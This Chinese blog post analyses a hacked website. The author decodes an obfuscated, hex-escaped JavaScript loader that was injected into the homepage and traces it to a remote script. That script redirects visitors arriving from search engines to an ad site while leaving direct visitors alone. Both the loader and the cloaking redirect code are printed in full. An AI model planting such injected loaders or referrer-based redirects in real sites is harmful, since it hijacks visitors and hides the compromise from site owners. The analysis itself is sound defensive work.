网站被黑,首页留下一段js代码,加密或者转码了的代码,怎么解密?

直接替换最外层的eval为console.log,然后得到

window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x77\x72\x69\x74\x65”]( \x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x73\x73\x64\x6c\x63\x2e\x63\x6f\x6d\x2f\x6e\x62\x2e\x6a\x73\x22\x3e \x2f\x73\x63\x72\x69\x70\x74\x3e);

然后发现是编码后的文字,于是直接两侧套个“,得到

window[“document”][“write”](<script type=”text/javascript” src=”https://www.gssdlc.com/nb.js”></script>);

于是结果就是加载一个js文件,直接下载这个js文件,得到

document.writeln(“<script LANGUAGE=\”Javascript\”>”); document.writeln(“var s=document.referrer”); document.writeln(“if(s.indexOf(\”baidu\”)>0 || s.indexOf(\”sogou\”)>0 || s.indexOf(\”soso\”)>0 ||s.indexOf(\”sm\”)>0 ||s.indexOf(\”uc\”)>0 ||s.indexOf(\”bing\”)>0 ||s.indexOf(\”yahoo\”)>0 ||s.indexOf(\”so\”)>0 )”); document.writeln(“location.href=\”https://www.444332.vip/?channel=P00142\”;”); document.writeln(“</script>”);

没有啥可看的,基本就是判断是不是从国内主流搜索引擎来的,搜索引擎来的就跳转,不是搜索引擎来的就不跳转。。。。。所以你自己访问的时候可能不会看到广告页面,而新用户访问的时候则会看到广告页面(

© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片